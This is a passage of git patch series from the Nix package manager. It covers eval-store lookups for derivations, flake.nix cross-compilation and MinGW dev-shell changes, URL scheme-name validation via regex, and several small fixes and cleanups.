+ /* Get the derivation. It is probably in the eval store, but it might be inthe main store: - /* Get the derivation. */ - drv = std::make_unique(worker.evalStore.readDerivation(drvPath)); + - Resolved derivation are resolved against main store realisations, and so must be stored there. + + - Dynamic derivations are built, and so are found in the main store. 
+ */ + for (auto * drvStore : { &worker.evalStore, &worker.store }) { + if (drvStore->isValidPath(drvPath)) { + drv = std::make_unique(drvStore->readDerivation(drvPath)); + break; + } + } + assert(drv); haveDerivation(); } @@ -401,11 +410,15 @@ void DerivationGoal::gaveUpOnSubstitution() } /* Copy the input sources from the eval store to the build - store. */ + store. + + Note that some inputs might not be in the eval store because they + are (resolved) derivation outputs in a resolved derivation. */ if (&worker.evalStore != &worker.store) { RealisedPath::Set inputSrcs; for (auto & i : drv->inputSrcs) - inputSrcs.insert(i); + if (worker.evalStore.isValidPath(i)) + inputSrcs.insert(i); copyClosure(worker.evalStore, worker.store, inputSrcs); } @@ -453,7 +466,7 @@ void DerivationGoal::repairClosure() std::map outputsToDrv; for (auto & i : inputClosure) if (i.isDerivation()) { - auto depOutputs = worker.store.queryPartialDerivationOutputMap(i); + auto depOutputs = worker.store.queryPartialDerivationOutputMap(i, &worker.evalStore); for (auto & j : depOutputs) if (j.second) outputsToDrv.insert_or_assign(*j.second, i); @@ -604,7 +617,13 @@ void DerivationGoal::inputsRealised() return *outPath; } else { - auto outMap = worker.evalStore.queryDerivationOutputMap(depDrvPath); + auto outMap = [&]{ + for (auto * drvStore : { &worker.evalStore, &worker.store }) + if (drvStore->isValidPath(depDrvPath)) + return worker.store.queryDerivationOutputMap(depDrvPath, drvStore); + assert(false); + }(); + auto outMapPath = outMap.find(outputName); if (outMapPath == outMap.end()) { throw Error( @@ -1085,8 +1104,12 @@ void DerivationGoal::resolvedFinished() auto newRealisation = realisation; newRealisation.id = DrvOutput { initialOutput->outputHash, outputName }; newRealisation.signatures.clear(); - if (!drv->type().isFixed()) - newRealisation.dependentRealisations = drvOutputReferences(worker.store, *drv, realisation.outPath); + if (!drv->type().isFixed()) { + auto & drvStore = 
worker.evalStore.isValidPath(drvPath) + ? worker.evalStore + : worker.store; + newRealisation.dependentRealisations = drvOutputReferences(worker.store, *drv, realisation.outPath, &drvStore); + } signRealisation(newRealisation); worker.store.registerDrvOutput(newRealisation); } @@ -1379,7 +1402,10 @@ std::map> DerivationGoal::queryPartialDeri res.insert_or_assign(name, output.path(worker.store, drv->name, name)); return res; } else { - return worker.store.queryPartialDerivationOutputMap(drvPath); + for (auto * drvStore : { &worker.evalStore, &worker.store }) + if (drvStore->isValidPath(drvPath)) + return worker.store.queryPartialDerivationOutputMap(drvPath, drvStore); + assert(false); } } @@ -1392,7 +1418,10 @@ OutputPathMap DerivationGoal::queryDerivationOutputMap() res.insert_or_assign(name, *output.second); return res; } else { - return worker.store.queryDerivationOutputMap(drvPath); + for (auto * drvStore : { &worker.evalStore, &worker.store }) + if (drvStore->isValidPath(drvPath)) + return worker.store.queryDerivationOutputMap(drvPath, drvStore); + assert(false); } } diff --git a/src/libstore/misc.cc b/src/libstore/misc.cc index 9f63fbbb5..cc8ad3d02 100644 --- a/src/libstore/misc.cc +++ b/src/libstore/misc.cc @@ -331,8 +331,11 @@ std::map drvOutputReferences( std::map drvOutputReferences( Store & store, const Derivation & drv, - const StorePath & outputPath) + const StorePath & outputPath, + Store * evalStore_) { + auto & evalStore = evalStore_ ? 
*evalStore_ : store; + std::set inputRealisations; std::function::ChildNode &)> accumRealisations; @@ -340,7 +343,7 @@ std::map drvOutputReferences( accumRealisations = [&](const StorePath & inputDrv, const DerivedPathMap::ChildNode & inputNode) { if (!inputNode.value.empty()) { auto outputHashes = - staticOutputHashes(store, store.readDerivation(inputDrv)); + staticOutputHashes(evalStore, evalStore.readDerivation(inputDrv)); for (const auto & outputName : inputNode.value) { auto outputHash = get(outputHashes, outputName); if (!outputHash) @@ -362,7 +365,7 @@ std::map drvOutputReferences( SingleDerivedPath next = SingleDerivedPath::Built { d, outputName }; accumRealisations( // TODO deep resolutions for dynamic derivations, issue #8947, would go here. - resolveDerivedPath(store, next), + resolveDerivedPath(store, next, evalStore_), childNode); } } diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index 13e5a1446..2c883ce97 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -943,6 +943,7 @@ const ContentAddress * getDerivationCA(const BasicDerivation & drv); std::map drvOutputReferences( Store & store, const Derivation & drv, - const StorePath & outputPath); + const StorePath & outputPath, + Store * evalStore = nullptr); } diff --git a/src/nix-build/nix-build.cc b/src/nix-build/nix-build.cc index 01da028d8..8e9be14c1 100644 --- a/src/nix-build/nix-build.cc +++ b/src/nix-build/nix-build.cc @@ -462,7 +462,7 @@ static void main_nix_build(int argc, char * * argv) if (dryRun) return; if (shellDrv) { - auto shellDrvOutputs = store->queryPartialDerivationOutputMap(shellDrv.value()); + auto shellDrvOutputs = store->queryPartialDerivationOutputMap(shellDrv.value(), &*evalStore); shell = store->printStorePath(shellDrvOutputs.at("out").value()) + "/bin/bash"; } @@ -515,7 +515,7 @@ static void main_nix_build(int argc, char * * argv) std::function::ChildNode &)> accumInputClosure; accumInputClosure = [&](const StorePath & inputDrv, const 
DerivedPathMap::ChildNode & inputNode) { - auto outputs = evalStore->queryPartialDerivationOutputMap(inputDrv); + auto outputs = store->queryPartialDerivationOutputMap(inputDrv, &*evalStore); for (auto & i : inputNode.value) { auto o = outputs.at(i); store->computeFSClosure(*o, inputs); @@ -653,7 +653,7 @@ static void main_nix_build(int argc, char * * argv) if (counter) drvPrefix += fmt("-%d", counter + 1); - auto builtOutputs = evalStore->queryPartialDerivationOutputMap(drvPath); + auto builtOutputs = store->queryPartialDerivationOutputMap(drvPath, &*evalStore); auto maybeOutputPath = builtOutputs.at(outputName); assert(maybeOutputPath); diff --git a/tests/functional/ca/eval-store.sh b/tests/functional/ca/eval-store.sh new file mode 100644 index 000000000..9cc499606 --- /dev/null +++ b/tests/functional/ca/eval-store.sh @@ -0,0 +1,10 @@ +#!/usr/bin/env bash + +# Ensure that garbage collection works properly with ca derivations + +source common.sh + +export NIX_TESTS_CA_BY_DEFAULT=1 + +cd .. +source eval-store.sh diff --git a/tests/functional/ca/local.mk b/tests/functional/ca/local.mk index fd87b8d1f..4f86b268f 100644 --- a/tests/functional/ca/local.mk +++ b/tests/functional/ca/local.mk @@ -5,6 +5,7 @@ ca-tests := \ $(d)/concurrent-builds.sh \ $(d)/derivation-json.sh \ $(d)/duplicate-realisation-in-closure.sh \ + $(d)/eval-store.sh \ $(d)/gc.sh \ $(d)/import-derivation.sh \ $(d)/new-build-cmd.sh \ diff --git a/tests/functional/eval-store.sh b/tests/functional/eval-store.sh index 8fc859730..ec99fd953 100644 --- a/tests/functional/eval-store.sh +++ b/tests/functional/eval-store.sh @@ -11,7 +11,16 @@ rm -rf "$eval_store" nix build -f dependencies.nix --eval-store "$eval_store" -o "$TEST_ROOT/result" [[ -e $TEST_ROOT/result/foobar ]] -(! ls $NIX_STORE_DIR/*.drv) +if [[ ! 
-n "${NIX_TESTS_CA_BY_DEFAULT:-}" ]]; then + # Resolved CA derivations are written to store for building + # + # TODO when we something more systematic + # (https://github.com/NixOS/nix/issues/5025) that distinguishes + # between scratch storage for building and the final destination + # store, we'll be able to make this unconditional again -- resolved + # derivations should only appear in the scratch store. + (! ls $NIX_STORE_DIR/*.drv) +fi ls $eval_store/nix/store/*.drv clearStore @@ -26,5 +35,8 @@ rm -rf "$eval_store" nix-build dependencies.nix --eval-store "$eval_store" -o "$TEST_ROOT/result" [[ -e $TEST_ROOT/result/foobar ]] -(! ls $NIX_STORE_DIR/*.drv) +if [[ ! -n "${NIX_TESTS_CA_BY_DEFAULT:-}" ]]; then + # See above + (! ls $NIX_STORE_DIR/*.drv) +fi ls $eval_store/nix/store/*.drv From 0b81557e2cf30cebb916f82f192f04df38c810d7 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 6 Dec 2023 20:14:14 -0500 Subject: [PATCH 098/654] flake.nix: Put some list items on their own line These things are about to become longer --- flake.nix | 27 +++++++++++++++++++++++---- 1 file changed, 23 insertions(+), 4 deletions(-) diff --git a/flake.nix b/flake.nix index 99480183a..973bb55af 100644 --- a/flake.nix +++ b/flake.nix @@ -36,8 +36,10 @@ systems = linuxSystems ++ darwinSystems; crossSystems = [ - "armv6l-linux" "armv7l-linux" - "x86_64-freebsd13" "x86_64-netbsd" + "armv6l-linux" + "armv7l-linux" + "x86_64-freebsd13" + "x86_64-netbsd" ]; stdenvs = [ "gccStdenv" "clangStdenv" "clang11Stdenv" "stdenv" "libcxxStdenv" "ccacheStdenv" ]; @@ -575,8 +577,25 @@ # to https://nixos.org/nix/install. It downloads the binary # tarball for the user's system and calls the second half of the # installation script. 
- installerScript = installScriptFor [ "x86_64-linux" "i686-linux" "aarch64-linux" "x86_64-darwin" "aarch64-darwin" "armv6l-linux" "armv7l-linux" ]; - installerScriptForGHA = installScriptFor [ "x86_64-linux" "x86_64-darwin" "armv6l-linux" "armv7l-linux"]; + installerScript = installScriptFor [ + # Native + "x86_64-linux" + "i686-linux" + "aarch64-linux" + "x86_64-darwin" + "aarch64-darwin" + # Cross + "armv6l-linux" + "armv7l-linux" + ]; + installerScriptForGHA = installScriptFor [ + # Native + "x86_64-linux" + "x86_64-darwin" + # Cross + "armv6l-linux" + "armv7l-linux" + ]; # docker image with Nix inside dockerImage = lib.genAttrs linux64BitSystems (system: self.packages.${system}.dockerImage); From f60c2e8a5acabf5fb554f77014904bb0d0c91604 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 6 Dec 2023 20:28:11 -0500 Subject: [PATCH 099/654] flake.nix: `installScriptFor` take tarballs not strings Trying to look up keys in multiple places is not nice, better for the caller to be explicit. 
--- flake.nix | 32 ++++++++++++++++---------------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/flake.nix b/flake.nix index 973bb55af..185140092 100644 --- a/flake.nix +++ b/flake.nix @@ -256,7 +256,7 @@ ]; }; - installScriptFor = systems: + installScriptFor = tarballs: with nixpkgsFor.x86_64-linux.native; runCommand "installer-script" { buildInputs = [ nix ]; @@ -277,14 +277,14 @@ substitute ${./scripts/install.in} $out/install \ ${pkgs.lib.concatMapStrings - (system: let - tarball = if builtins.elem system crossSystems then self.hydraJobs.binaryTarballCross.x86_64-linux.${system} else self.hydraJobs.binaryTarball.${system}; + (tarball: let + inherit (tarball.stdenv.hostPlatform) system; in '' \ --replace '@tarballHash_${system}@' $(nix --experimental-features nix-command hash-file --base16 --type sha256 ${tarball}/*.tar.xz) \ --replace '@tarballPath_${system}@' $(tarballPath ${tarball}/*.tar.xz) \ '' ) - systems + tarballs } --replace '@nixVersion@' ${version} echo "file installer $out/install" >> $out/nix-support/hydra-build-products @@ -341,7 +341,7 @@ installerClosureInfo = buildPackages.closureInfo { rootPaths = [ nix cacert ]; }; in - buildPackages.runCommand "nix-binary-tarball-${version}" + pkgs.runCommand "nix-binary-tarball-${version}" { #nativeBuildInputs = lib.optional (system != "aarch64-linux") shellcheck; meta.description = "Distribution-independent Nix bootstrap binaries for ${pkgs.system}"; } @@ -579,22 +579,22 @@ # installation script. 
installerScript = installScriptFor [ # Native - "x86_64-linux" - "i686-linux" - "aarch64-linux" - "x86_64-darwin" - "aarch64-darwin" + self.hydraJobs.binaryTarball."x86_64-linux" + self.hydraJobs.binaryTarball."i686-linux" + self.hydraJobs.binaryTarball."aarch64-linux" + self.hydraJobs.binaryTarball."x86_64-darwin" + self.hydraJobs.binaryTarball."aarch64-darwin" # Cross - "armv6l-linux" - "armv7l-linux" + self.hydraJobs.binaryTarballCross."x86_64-linux"."armv6l-linux" + self.hydraJobs.binaryTarballCross."x86_64-linux"."armv7l-linux" ]; installerScriptForGHA = installScriptFor [ # Native - "x86_64-linux" - "x86_64-darwin" + self.hydraJobs.binaryTarball."x86_64-linux" + self.hydraJobs.binaryTarball."x86_64-darwin" # Cross - "armv6l-linux" - "armv7l-linux" + self.hydraJobs.binaryTarballCross."x86_64-linux"."armv6l-linux" + self.hydraJobs.binaryTarballCross."x86_64-linux"."armv7l-linux" ]; # docker image with Nix inside From 78492cfde73d57ca01c73d77a23440754c9e7ee4 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sat, 2 Sep 2023 14:36:25 -0400 Subject: [PATCH 100/654] flake.nix: Use `config` not `system` for cross so we can be a bit more precise --- flake.nix | 20 ++++++++++---------- maintainers/upload-release.pl | 4 ++-- 2 files changed, 12 insertions(+), 12 deletions(-) diff --git a/flake.nix b/flake.nix index 185140092..2f6668b81 100644 --- a/flake.nix +++ b/flake.nix @@ -36,10 +36,10 @@ systems = linuxSystems ++ darwinSystems; crossSystems = [ - "armv6l-linux" - "armv7l-linux" - "x86_64-freebsd13" - "x86_64-netbsd" + "armv6l-unknown-linux-gnueabihf" + "armv7l-unknown-linux-gnueabihf" + "x86_64-unknown-freebsd13" + "x86_64-unknown-netbsd" ]; stdenvs = [ "gccStdenv" "clangStdenv" "clang11Stdenv" "stdenv" "libcxxStdenv" "ccacheStdenv" ]; @@ -116,8 +116,8 @@ inherit system; }; crossSystem = if crossSystem == null then null else { - system = crossSystem; - } // lib.optionalAttrs (crossSystem == "x86_64-freebsd13") { + config = crossSystem; + } // lib.optionalAttrs 
(crossSystem == "x86_64-unknown-freebsd13") { useLLVM = true; }; overlays = [ @@ -585,16 +585,16 @@ self.hydraJobs.binaryTarball."x86_64-darwin" self.hydraJobs.binaryTarball."aarch64-darwin" # Cross - self.hydraJobs.binaryTarballCross."x86_64-linux"."armv6l-linux" - self.hydraJobs.binaryTarballCross."x86_64-linux"."armv7l-linux" + self.hydraJobs.binaryTarballCross."x86_64-linux"."armv6l-unknown-linux-gnueabihf" + self.hydraJobs.binaryTarballCross."x86_64-linux"."armv7l-unknown-linux-gnueabihf" ]; installerScriptForGHA = installScriptFor [ # Native self.hydraJobs.binaryTarball."x86_64-linux" self.hydraJobs.binaryTarball."x86_64-darwin" # Cross - self.hydraJobs.binaryTarballCross."x86_64-linux"."armv6l-linux" - self.hydraJobs.binaryTarballCross."x86_64-linux"."armv7l-linux" + self.hydraJobs.binaryTarballCross."x86_64-linux"."armv6l-unknown-linux-gnueabihf" + self.hydraJobs.binaryTarballCross."x86_64-linux"."armv7l-unknown-linux-gnueabihf" ]; # docker image with Nix inside diff --git a/maintainers/upload-release.pl b/maintainers/upload-release.pl index ebc536f12..4e2c379f0 100755 --- a/maintainers/upload-release.pl +++ b/maintainers/upload-release.pl @@ -154,8 +154,8 @@ downloadFile("binaryTarball.x86_64-linux", "1"); downloadFile("binaryTarball.aarch64-linux", "1"); downloadFile("binaryTarball.x86_64-darwin", "1"); downloadFile("binaryTarball.aarch64-darwin", "1"); -downloadFile("binaryTarballCross.x86_64-linux.armv6l-linux", "1"); -downloadFile("binaryTarballCross.x86_64-linux.armv7l-linux", "1"); +downloadFile("binaryTarballCross.x86_64-linux.armv6l-unknown-linux-gnueabihf", "1"); +downloadFile("binaryTarballCross.x86_64-linux.armv7l-unknown-linux-gnueabihf", "1"); downloadFile("installerScript", "1"); # Upload docker images to dockerhub. 
From 46b98a40a7c5488a99525bc780b7f7bba0131545 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sat, 2 Sep 2023 14:38:33 -0400 Subject: [PATCH 101/654] flake.nix: Make changes so a MinGW dev shell would work --- flake.nix | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/flake.nix b/flake.nix index 2f6668b81..f0dd9a3e3 100644 --- a/flake.nix +++ b/flake.nix @@ -210,7 +210,7 @@ buildDeps = [ curl - bzip2 xz brotli editline + bzip2 xz brotli openssl sqlite libarchive (pkgs.libgit2.overrideAttrs (attrs: { @@ -219,10 +219,13 @@ cmakeFlags = (attrs.cmakeFlags or []) ++ ["-DUSE_SSH=exec"]; })) boost - lowdown-nix libsodium ] - ++ lib.optionals stdenv.isLinux [libseccomp] + ++ lib.optionals (!stdenv.hostPlatform.isWindows) [ + editline + lowdown-nix + ] + ++ lib.optional stdenv.isLinux libseccomp ++ lib.optional stdenv.hostPlatform.isx86_64 libcpuid; checkDeps = [ @@ -510,7 +513,7 @@ stdenv = currentStdenv; }; - meta.platforms = lib.platforms.unix; + meta.platforms = lib.platforms.unix ++ lib.platforms.windows; meta.mainProgram = "nix"; }); From b892161e314d976e7692ffcf487e1aa042165745 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 11 Dec 2023 12:26:42 -0500 Subject: [PATCH 102/654] flake.nix: Make a MinGW dev shell This requires a `shellCrossSystems` for now, since Nix doesn't actually build on Windows. This can be dropped once it does. --- flake.nix | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/flake.nix b/flake.nix index f0dd9a3e3..bbdfc38e9 100644 --- a/flake.nix +++ b/flake.nix @@ -42,6 +42,13 @@ "x86_64-unknown-netbsd" ]; + # Nix doesn't yet build on this platform, so we put it in a + # separate list. We just use this for `devShells` and + # `nixpkgsFor`, which this depends on. 
+ shellCrossSystems = crossSystems ++ [ + "x86_64-w64-mingw32" + ]; + stdenvs = [ "gccStdenv" "clangStdenv" "clang11Stdenv" "stdenv" "libcxxStdenv" "ccacheStdenv" ]; forAllSystems = lib.genAttrs systems; @@ -129,7 +136,7 @@ in { inherit stdenvs native; static = native.pkgsStatic; - cross = forAllCrossSystems (crossSystem: make-pkgs crossSystem "stdenv"); + cross = lib.genAttrs shellCrossSystems (crossSystem: make-pkgs crossSystem "stdenv"); }); commonDeps = @@ -808,7 +815,7 @@ in (makeShells "native" nixpkgsFor.${system}.native) // (makeShells "static" nixpkgsFor.${system}.static) // - (forAllCrossSystems (crossSystem: let pkgs = nixpkgsFor.${system}.cross.${crossSystem}; in makeShell pkgs pkgs.stdenv)) // + (lib.genAttrs shellCrossSystems (crossSystem: let pkgs = nixpkgsFor.${system}.cross.${crossSystem}; in makeShell pkgs pkgs.stdenv)) // { default = self.devShells.${system}.native-stdenvPackages; } From 589fb105f311af65230d374cbbddf7173c7ad103 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= Date: Tue, 12 Dec 2023 16:05:32 +0100 Subject: [PATCH 103/654] Fix the VM tests Work around https://github.com/NixOS/nixpkgs/issues/271146 until we can depend on a Nixpkgs version containing https://github.com/NixOS/nixpkgs/pull/271423 --- flake.nix | 4 ++++ tests/nixos/default.nix | 1 + 2 files changed, 5 insertions(+) diff --git a/flake.nix b/flake.nix index bbdfc38e9..ada52c05d 100644 --- a/flake.nix +++ b/flake.nix @@ -7,6 +7,10 @@ # Also, do not grab arbitrary further staging commits. This PR was # carefully made to be based on release-23.05 and just contain # rebuild-causing changes to packages that Nix actually uses. + # + # Once this is updated to something containing + # https://github.com/NixOS/nixpkgs/pull/271423, don't forget + # to remove the `nix.checkAllErrors = false;` line in the tests. 
inputs.nixpkgs.url = "github:NixOS/nixpkgs/staging-23.05"; inputs.nixpkgs-regression.url = "github:NixOS/nixpkgs/215d4d0fd80ca5163643b03a33fde804a29cc1e2"; inputs.lowdown-src = { url = "github:kristapsdz/lowdown"; flake = false; }; diff --git a/tests/nixos/default.nix b/tests/nixos/default.nix index 4459aa664..2645cac8e 100644 --- a/tests/nixos/default.nix +++ b/tests/nixos/default.nix @@ -10,6 +10,7 @@ let hostPkgs = nixpkgsFor.${system}.native; defaults = { nixpkgs.pkgs = nixpkgsFor.${system}.native; + nix.checkAllErrors = false; }; _module.args.nixpkgs = nixpkgs; }; From 2e451a663eff96b89360cfd3c0d5eaa60ca46181 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 12 Dec 2023 17:22:54 +0100 Subject: [PATCH 104/654] schemeRegex -> schemeNameRegex Scheme could be understood to include the typical `:` separator. --- src/libutil/url-parts.hh | 2 +- src/libutil/url.cc | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/src/libutil/url-parts.hh b/src/libutil/url-parts.hh index 5c5a30dc2..07bc8d0cd 100644 --- a/src/libutil/url-parts.hh +++ b/src/libutil/url-parts.hh @@ -8,7 +8,7 @@ namespace nix { // URI stuff. 
const static std::string pctEncoded = "(?:%[0-9a-fA-F][0-9a-fA-F])"; -const static std::string schemeRegex = "(?:[a-z][a-z0-9+.-]*)"; +const static std::string schemeNameRegex = "(?:[a-z][a-z0-9+.-]*)"; const static std::string ipv6AddressSegmentRegex = "[0-9a-fA-F:]+(?:%\\w+)?"; const static std::string ipv6AddressRegex = "(?:\\[" + ipv6AddressSegmentRegex + "\\]|" + ipv6AddressSegmentRegex + ")"; const static std::string unreservedRegex = "(?:[a-zA-Z0-9-._~])"; diff --git a/src/libutil/url.cc b/src/libutil/url.cc index f2d5f1782..e9acd67d0 100644 --- a/src/libutil/url.cc +++ b/src/libutil/url.cc @@ -14,7 +14,7 @@ std::regex revRegex(revRegexS, std::regex::ECMAScript); ParsedURL parseURL(const std::string & url) { static std::regex uriRegex( - "((" + schemeRegex + "):" + "((" + schemeNameRegex + "):" + "(?:(?://(" + authorityRegex + ")(" + absPathRegex + "))|(/?" + pathRegex + ")))" + "(?:\\?(" + queryRegex + "))?" + "(?:#(" + queryRegex + "))?", From 4eaeda6604e2f8977728f14415fe92350d047970 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 12 Dec 2023 17:43:54 +0100 Subject: [PATCH 105/654] isValidSchemeName: Use regex As requested by Eelco Dolstra. I think it used to be simpler. 
--- src/libutil/url.cc | 15 +++------------ tests/unit/libutil/url.cc | 5 +++++ 2 files changed, 8 insertions(+), 12 deletions(-) diff --git a/src/libutil/url.cc b/src/libutil/url.cc index e9acd67d0..152c06d8e 100644 --- a/src/libutil/url.cc +++ b/src/libutil/url.cc @@ -3,7 +3,6 @@ #include "util.hh" #include "split.hh" #include "canon-path.hh" -#include "string.hh" namespace nix { @@ -187,17 +186,9 @@ std::string fixGitURL(const std::string & url) // https://www.rfc-editor.org/rfc/rfc3986#section-3.1 bool isValidSchemeName(std::string_view s) { - if (s.empty()) return false; - if (!isASCIIAlpha(s[0])) return false; - for (auto c : s.substr(1)) { - if (isASCIIAlpha(c)) continue; - if (isASCIIDigit(c)) continue; - if (c == '+') continue; - if (c == '-') continue; - if (c == '.') continue; - return false; - } - return true; + static std::regex regex(schemeNameRegex, std::regex::ECMAScript); + + return std::regex_match(s.begin(), s.end(), regex, std::regex_constants::match_default); } } diff --git a/tests/unit/libutil/url.cc b/tests/unit/libutil/url.cc index 09fa4e218..7d08f467e 100644 --- a/tests/unit/libutil/url.cc +++ b/tests/unit/libutil/url.cc @@ -360,6 +360,11 @@ TEST(nix, isValidSchemeName) { ASSERT_FALSE(isValidSchemeName(".file")); ASSERT_FALSE(isValidSchemeName("-file")); ASSERT_FALSE(isValidSchemeName("1file")); + // regex ok? + ASSERT_FALSE(isValidSchemeName("\nhttp")); + ASSERT_FALSE(isValidSchemeName("\nhttp\n")); + ASSERT_FALSE(isValidSchemeName("http\n")); + ASSERT_FALSE(isValidSchemeName("http ")); } } From 0b87ba50c08d83384e11a8e6db1e2f97fba4b61c Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 12 Dec 2023 17:44:53 +0100 Subject: [PATCH 106/654] Revert "Add nix::isASCII*, locale-independent" This reverts commit 79eb2920bb51c7ec9528a403986e79f04738e2be. Not used at this time. 
--- src/libutil/string.hh | 17 ----------- tests/unit/libutil/string.cc | 59 ------------------------------------ 2 files changed, 76 deletions(-) delete mode 100644 src/libutil/string.hh delete mode 100644 tests/unit/libutil/string.cc diff --git a/src/libutil/string.hh b/src/libutil/string.hh deleted file mode 100644 index 16ef75643..000000000 --- a/src/libutil/string.hh +++ /dev/null @@ -1,17 +0,0 @@ -#pragma once - -namespace nix { - - /** Locale-independent version of std::islower(). */ - inline bool isASCIILower(char c) { return c >= 'a' && c <= 'z'; }; - - /** Locale-independent version of std::isupper(). */ - inline bool isASCIIUpper(char c) { return c >= 'A' && c <= 'Z'; }; - - /** Locale-independent version of std::isalpha(). */ - inline bool isASCIIAlpha(char c) { return isASCIILower(c) || isASCIIUpper(c); }; - - /** Locale-independent version of std::isdigit(). */ - inline bool isASCIIDigit(char c) { return c >= '0' && c <= '9'; }; - -} diff --git a/tests/unit/libutil/string.cc b/tests/unit/libutil/string.cc deleted file mode 100644 index 381f2cc15..000000000 --- a/tests/unit/libutil/string.cc +++ /dev/null @@ -1,59 +0,0 @@ -#include -#include "string.hh" - -namespace nix { - -TEST(string, isASCIILower) { - ASSERT_TRUE(isASCIILower('a')); - ASSERT_TRUE(isASCIILower('z')); - ASSERT_FALSE(isASCIILower('A')); - ASSERT_FALSE(isASCIILower('Z')); - ASSERT_FALSE(isASCIILower('0')); - ASSERT_FALSE(isASCIILower('9')); - ASSERT_FALSE(isASCIILower(' ')); - ASSERT_FALSE(isASCIILower('\n')); - ASSERT_FALSE(isASCIILower('\t')); - ASSERT_FALSE(isASCIILower(':')); -} - -TEST(string, isASCIIUpper) { - ASSERT_FALSE(isASCIIUpper('a')); - ASSERT_FALSE(isASCIIUpper('z')); - ASSERT_TRUE(isASCIIUpper('A')); - ASSERT_TRUE(isASCIIUpper('Z')); - ASSERT_FALSE(isASCIIUpper('0')); - ASSERT_FALSE(isASCIIUpper('9')); - ASSERT_FALSE(isASCIIUpper(' ')); - ASSERT_FALSE(isASCIIUpper('\n')); - ASSERT_FALSE(isASCIIUpper('\t')); - ASSERT_FALSE(isASCIIUpper(':')); -} - -TEST(string, 
isASCIIAlpha) { - ASSERT_TRUE(isASCIIAlpha('a')); - ASSERT_TRUE(isASCIIAlpha('z')); - ASSERT_TRUE(isASCIIAlpha('A')); - ASSERT_TRUE(isASCIIAlpha('Z')); - ASSERT_FALSE(isASCIIAlpha('0')); - ASSERT_FALSE(isASCIIAlpha('9')); - ASSERT_FALSE(isASCIIAlpha(' ')); - ASSERT_FALSE(isASCIIAlpha('\n')); - ASSERT_FALSE(isASCIIAlpha('\t')); - ASSERT_FALSE(isASCIIAlpha(':')); -} - -TEST(string, isASCIIDigit) { - ASSERT_FALSE(isASCIIDigit('a')); - ASSERT_FALSE(isASCIIDigit('z')); - ASSERT_FALSE(isASCIIDigit('A')); - ASSERT_FALSE(isASCIIDigit('Z')); - ASSERT_TRUE(isASCIIDigit('0')); - ASSERT_TRUE(isASCIIDigit('1')); - ASSERT_TRUE(isASCIIDigit('9')); - ASSERT_FALSE(isASCIIDigit(' ')); - ASSERT_FALSE(isASCIIDigit('\n')); - ASSERT_FALSE(isASCIIDigit('\t')); - ASSERT_FALSE(isASCIIDigit(':')); -} - -} \ No newline at end of file From 04f454f2a0e1bfb4fc0368872f215cb690df11bc Mon Sep 17 00:00:00 2001 From: SharzyL Date: Wed, 13 Dec 2023 10:30:28 +0800 Subject: [PATCH 107/654] fix: nix copy ssh-ng:// not respecting --substitute-on-destination --- src/libstore/remote-store.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc index cc26c2a94..dd6347468 100644 --- a/src/libstore/remote-store.cc +++ b/src/libstore/remote-store.cc @@ -225,7 +225,7 @@ StorePathSet RemoteStore::queryValidPaths(const StorePathSet & paths, Substitute conn->to << WorkerProto::Op::QueryValidPaths; WorkerProto::write(*this, *conn, paths); if (GET_PROTOCOL_MINOR(conn->daemonVersion) >= 27) { - conn->to << (settings.buildersUseSubstitutes ? 
1 : 0); + conn->to << maybeSubstitute; } conn.processStderr(); return WorkerProto::Serialise::read(*this, *conn); From cc3913e4584beb19e7af00572db119d2638333d5 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 13 Dec 2023 13:27:23 +0100 Subject: [PATCH 108/654] Remove unused variable --- src/libexpr/eval.hh | 5 ----- 1 file changed, 5 deletions(-) diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index f3f6d35b9..f452dcb9f 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -335,11 +335,6 @@ private: std::map> searchPathResolved; - /** - * Cache used by checkSourcePath(). - */ - std::unordered_map resolvedPaths; - /** * Cache used by prim_match(). */ From 103ca0bde5d4f32745d4c3aee534cf4aa0a69a9d Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 13 Dec 2023 13:27:29 +0100 Subject: [PATCH 109/654] Improve SourcePath display --- src/libfetchers/input-accessor.hh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libfetchers/input-accessor.hh b/src/libfetchers/input-accessor.hh index d5ac238b1..f385e6231 100644 --- a/src/libfetchers/input-accessor.hh +++ b/src/libfetchers/input-accessor.hh @@ -130,7 +130,7 @@ struct SourcePath { return accessor->getPhysicalPath(path); } std::string to_string() const - { return path.abs(); } + { return accessor->showPath(path); } /** * Append a `CanonPath` to this path. From faa4cae9aed4e9f8c40ed8c6fe00bd0216c3b0ea Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 13 Dec 2023 13:27:39 +0100 Subject: [PATCH 110/654] LibExprTest: Ignore $NIX_PATH Otherwise a broken $NIX_PATH can cause the test suite to fail. 
